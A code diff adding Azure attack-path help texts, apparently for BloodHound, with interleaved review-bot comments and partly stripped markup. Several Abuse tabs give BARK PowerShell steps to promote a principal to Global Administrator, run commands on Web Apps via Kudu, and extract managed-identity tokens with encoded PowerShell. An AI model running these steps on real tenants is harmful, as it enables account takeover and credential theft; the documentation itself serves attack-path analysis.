+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..97bcdde41 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Application.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGApplication_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the Directory.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ >
+ );
+};
+
+export default Abuse;
diff --git a/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/General.jsx
new file mode 100644
index 000000000..1bbb9e134
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/General.jsx
@@ -0,0 +1,16 @@
+import React from 'react';
+
+const General = () => {
+ return (
+ <>
++ This edge is created when a Service Principal has been
+ granted the Directory.ReadWrite.All edge. The edge is
+ not abusable, but is used during post-processing to create
+ abusable edges.
+
+ >
+ );
+};
+
+export default General;
diff --git a/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/Opsec.jsx
new file mode 100644
index 000000000..8937a6128
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/Opsec.jsx
@@ -0,0 +1,16 @@
+import React from 'react';
+
+const Opsec = () => {
+ return (
+ <>
++ This edge is created when a Service Principal has been
+ granted the Directory.ReadWrite.All edge. The edge is
+ not abusable, but is used during post-processing to create
+ abusable edges.
+
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ With the ability to grant arbitrary app roles, you can grant + the RoleManagement.ReadWrite.Directory app role to a Service + Principal you already control, and then promote it or another + principal to Global Administrator. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to grant app roles. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Use BARK's Get-AllAzureADServicePrincipals to collect all + Service Principal objects in the tenant: +
+ +
+
+ {
+ '$SPs = Get-AllAzureADServicePrincipals `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + Next, find the MS Graph Service Principal's ID. You can do this by + piping $SPs to Where-Object, finding objects where the appId value + matches the universal ID for the MS Graph Service Principal, which is + 00000003-0000-0000-c000-000000000000: +
+ +
+
+ {
+ '$SPs | ?{$_.appId -Like "00000003-0000-0000-c000-000000000000"} | Select id'
+ }
+
+
+
+ + The output will be the object ID of the MS Graph Service Principal. + Take that ID and use it as the "ResourceID" argument for BARK's + New-AppRoleAssignment function. The AppRoleID of '9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8' + is the universal ID for RoleManagement.ReadWrite.Directory. The + SPObjectId is the object ID of the Service Principal you want to grant + this app role to: +
+ +
+
+ {
+ 'New-AppRoleAssignment `\n' +
+ ' -SPObjectId "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `\n' +
+ ' -AppRoleID "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" `\n' +
+ ' -ResourceID "9858020a-4c00-4399-9ae4-e7897a8333fa" `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + If successful, the output of this command will show you the App Role + assignment ID. Now that your Service Principal has the RoleManagement.ReadWrite.Directory + MS Graph app role, you can promote the Service Principal to Global Administrator + using BARK's New-AzureADRoleAssignment. +
+ +
+
+ {
+ 'New-AzureADRoleAssignment `\n' +
+ ' -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `\n' +
+ ' -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + If successful, the output will include the principal ID, the role ID, and a + unique ID for the role assignment. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGrantAppRoles/General.jsx b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/General.jsx new file mode 100644 index 000000000..52591032f --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/General.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + AzureAD tenant objects when a Service Principal has one of the following + MS Graph app role assignments: +
+ ++
+ When you assign an app role to a Service Principal, the Azure + Audit logs will create an event called "Add app role assignment + to service principal". This event describes who made the change, + what the target service principal was, and what app role assignment + was granted. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGrantAppRoles/References.jsx b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ To abuse this privilege, you can promote a principal you control + to Global Administrator using BARK's New-AzureADRoleAssignment. +
+ ++ This function requires you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to grant AzureAD admin roles. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Then use BARK's New-AzureADRoleAssignment function to grant the + AzureAD role to your target principal: +
+ +
+
+ {
+ 'New-AzureADRoleAssignment `\n' +
+ ' -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `\n' +
+ ' -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + If successful, the output will include the principal ID, the role ID, and a + unique ID for the role assignment. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGrantRole/General.jsx b/src/components/Modals/HelpTexts/AZMGGrantRole/General.jsx new file mode 100644 index 000000000..67d9348e0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantRole/General.jsx @@ -0,0 +1,27 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + all AzureAD admin roles when a Service Principal has the following + MS Graph app role assignment: +
+ ++
+ This privilege allows the Service Principal to promote itself or + any other principal to any AzureAD admin role, including Global + Administrator. +
+ >
+ );
+};
+
+export default General;
diff --git a/src/components/Modals/HelpTexts/AZMGGrantRole/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGGrantRole/Opsec.jsx
new file mode 100644
index 000000000..72777be38
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZMGGrantRole/Opsec.jsx
@@ -0,0 +1,16 @@
+import React from 'react';
+
+const Opsec = () => {
+ return (
+ <>
++ When you assign an AzureAD admin role to a principal
+ using this privilege, the Azure Audit log will create
+ an event called "Add member to role outside of PIM
+ (permanent)".
+
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGrantRole/References.jsx b/src/components/Modals/HelpTexts/AZMGGrantRole/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantRole/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the GroupMember.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/General.jsx new file mode 100644 index 000000000..dde78bc45 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the GroupMember.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..324de0216 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the GroupMember.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the Group.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/General.jsx new file mode 100644 index 000000000..7841ebf31 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Group.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..a467563f9 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Group.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the RoleManagement.ReadWrite.Directory edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/General.jsx b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/General.jsx new file mode 100644 index 000000000..f618fc963 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the RoleManagement.ReadWrite.Directory edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/Opsec.jsx new file mode 100644 index 000000000..91534c348 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the RoleManagement.ReadWrite.Directory edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/References.jsx b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/References.jsx new file mode 100644 index 000000000..bb21ba56d --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the ServicePrincipalEndpoint.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/General.jsx new file mode 100644 index 000000000..d5f0042d2 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the ServicePrincipalEndpoint.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..3e4ae4648 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the ServicePrincipalEndpoint.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ You will abuse this relationship by executing a command + against the AKS Managed Cluster the edge is emiting from. + You can target any managed identity assignment scoped to + the Virtual Machine Scale Sets under the target Resource Group. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZNodeResourceGroup/General.jsx b/src/components/Modals/HelpTexts/AZNodeResourceGroup/General.jsx new file mode 100644 index 000000000..33a9d550f --- /dev/null +++ b/src/components/Modals/HelpTexts/AZNodeResourceGroup/General.jsx @@ -0,0 +1,23 @@ +import React from 'react'; + +const General = () => { + return ( + <> + ++ This edge is created to link Azure Kubernetes Service + Managed Clusters to the Virtual Machine Scale Sets they + use to execute commands on. +
+ ++ The system-assigned identity for the AKS Cluster will + have the Contributor role against the target Resource Group + and its child Virtual Machine Scale Sets. +
+ + > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZNodeResourceGroup/Opsec.jsx b/src/components/Modals/HelpTexts/AZNodeResourceGroup/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZNodeResourceGroup/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
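Review bot: The first paragraph of this General.jsx says the edge links AKS Managed Clusters "to the Virtual Machine Scale Sets they use to execute commands on", while the edge name and the second paragraph (Contributor "against the target Resource Group and its child Virtual Machine Scale Sets") make the target the node Resource Group, so the two paragraphs disagree about what the edge points at. If the Resource Group is the target, as the name suggests, the first sentence should read `to the node Resource Group that holds the Virtual Machine Scale Sets they run commands on.`; if the VMSS is the target, the second paragraph should say so instead. The phrase "use to execute commands on" is also awkward either way. The hunk's opening lines are only partly legible in this chunk because markup was stripped.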
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZNodeResourceGroup/References.jsx b/src/components/Modals/HelpTexts/AZNodeResourceGroup/References.jsx new file mode 100644 index 000000000..457bae3bf --- /dev/null +++ b/src/components/Modals/HelpTexts/AZNodeResourceGroup/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can use BARK's Invoke-AzureRMWebAppShellCommand function + to execute commands on a target Web App. You can use BARK's + New-PowerShellFunctionAppFunction, Get-AzureFunctionAppMasterKeys, + and Get-AzureFunctionOutput functions to execute arbitrary + commands against a target Function App. +
+ ++ These functions require you to supply an Azure Resource Manager + scoped JWT associated with the principal that has the privilege + to execute commands on the web app or function app. There are + several ways to acquire a JWT. For example, you may use BARK's + Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$ARMToken = Get-ARMTokenWithRefreshToken `\n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" `\n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Now you can use BARK's Invoke-AzureRMWebAppShellCommand function + to execute a command against the target Web App. + For example, to run a simple "whoami" command: +
+ +
+
+ {
+ 'Invoke-AzureRMWebAppShellCommand `\n' +
+ ' -KuduURI "https://mycoolwindowswebapp.scm.azurewebsites.net/api/command" `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -Command "whoami"'
+ }
+
+
+
+
+ + If the Web App has a managed identity assignments, you can use BARK's + Invoke-AzureRMWebAppShellCommand function to retrieve a JWT for the + managed identity Service Principal like this: +
+ + +
+
+ {
+ 'PS C:\> $PowerShellCommand = ' + '\n' +
+ ' $headers=@{"X-IDENTITY-HEADER"=$env:IDENTITY_HEADER}\n' +
+ ' $response = Invoke-WebRequest -UseBasicParsing -Uri "$($env:IDENTITY_ENDPOINT)?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers $headers\n' +
+ ' $response.RawContent' + '\n\n' +
+
+ 'PS C:\> $base64Cmd = [System.Convert]::ToBase64String(\n' +
+ ' [System.Text.Encoding]::Unicode.GetBytes(\n' +
+ ' $PowerShellCommand\n' +
+ ' )\n' +
+ ' )\n\n' +
+
+ 'PS C:\> $Command = "powershell -enc $($base64Cmd)"\n\n' +
+
+ 'PS C:\> Invoke-AzureRMWebAppShellCommand `\n' +
+ ' -KuduURI "https://mycoolwindowswebapp.scm.azurewebsites.net/api/command" `\n' +
+ ' -token $ARMToken `\n' +
+ ' -Command $Command'
+ }
+
+
+
+
+ + If successful, the output will include a JWT for the managed identity + service principal. +
+ >
+ );
+};
+
+export default Abuse;
diff --git a/src/components/Modals/HelpTexts/AZWebsiteContributor/General.jsx b/src/components/Modals/HelpTexts/AZWebsiteContributor/General.jsx
new file mode 100644
index 000000000..999403b35
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZWebsiteContributor/General.jsx
@@ -0,0 +1,14 @@
+import React from 'react';
+
+const General = () => {
+ return (
++ The Website Contributor role grants full control of the target
+ Function App or Web App. Full control of either of those types
+ of resources allows for arbitrary command execution against the
+ target resoruce.
+
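Review bot: The `'PS C:\> ...'` prompt prefixes in the last code sample (the lines beginning `'PS C:\> $PowerShellCommand = '`, `'PS C:\> $base64Cmd = `, `'PS C:\> $Command = `, and `'PS C:\> Invoke-AzureRMWebAppShellCommand `) will render as `PS C:> ...`, because `\>` is not a recognised escape in a JavaScript string literal and the backslash is silently dropped; either write `'PS C:\\> '` or drop the prompt prefix, as every other code sample in this file already does. The parameter is spelled `-token` in that sample but `-Token` in the earlier `Invoke-AzureRMWebAppShellCommand` sample; PowerShell does not care, but the two samples read as if they used different parameters, so pick one spelling. The sentence "If the Web App has a managed identity assignments" should be `If the Web App has a managed identity assignment`. The `diff` header and the component's opening lines for this Abuse.jsx hunk are not legible in this chunk, so the start of the file could not be reviewed.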
+ );
+};
+
+export default General;
diff --git a/src/components/Modals/HelpTexts/AZWebsiteContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZWebsiteContributor/Opsec.jsx
new file mode 100644
index 000000000..1d2ddcaf0
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AZWebsiteContributor/Opsec.jsx
@@ -0,0 +1,12 @@
+import React from 'react';
+
+const Opsec = () => {
+ return (
++ This will depend on which particular abuse you perform, but in
+ general Azure will create a log event for each abuse.
+
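Review bot: `target resoruce.` on the last text line of the General.jsx paragraph is a typo that will be shown verbatim in the help modal; it should read `target resource.`. While touching the line, "Full control of either of those types of resources" reads more cleanly as `Full control of either resource type`. Nothing else in the hunk needs changing.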
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZWebsiteContributor/References.jsx b/src/components/Modals/HelpTexts/AZWebsiteContributor/References.jsx new file mode 100644 index 000000000..93ab469fc --- /dev/null +++ b/src/components/Modals/HelpTexts/AZWebsiteContributor/References.jsx @@ -0,0 +1,21 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + +
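Review bot: The Opsec.jsx in this hunk is byte-identical to the AZNodeResourceGroup Opsec.jsx added earlier in this commit (both resolve to blob 1d2ddcaf0) and its only sentence, "in general Azure will create a log event for each abuse", gives a defender no indication of which log to check. The Abuse text for this edge shows every command going through the Kudu `api/command` endpoint of the target app, so the Opsec text could at least say that, presumably, evidence of this abuse lives in the App Service/Kudu side rather than only in the Azure Activity Log; I would phrase it as a pointer to check rather than a guarantee, since the hunk itself does not establish what is logged. A sentence such as `Commands issued this way reach the target through its Kudu (SCM) endpoint, so review the App Service logs for that site in addition to the Azure Activity Log.` would make the tab useful. The References.jsx hunk that follows runs past the end of this chunk and was not reviewed.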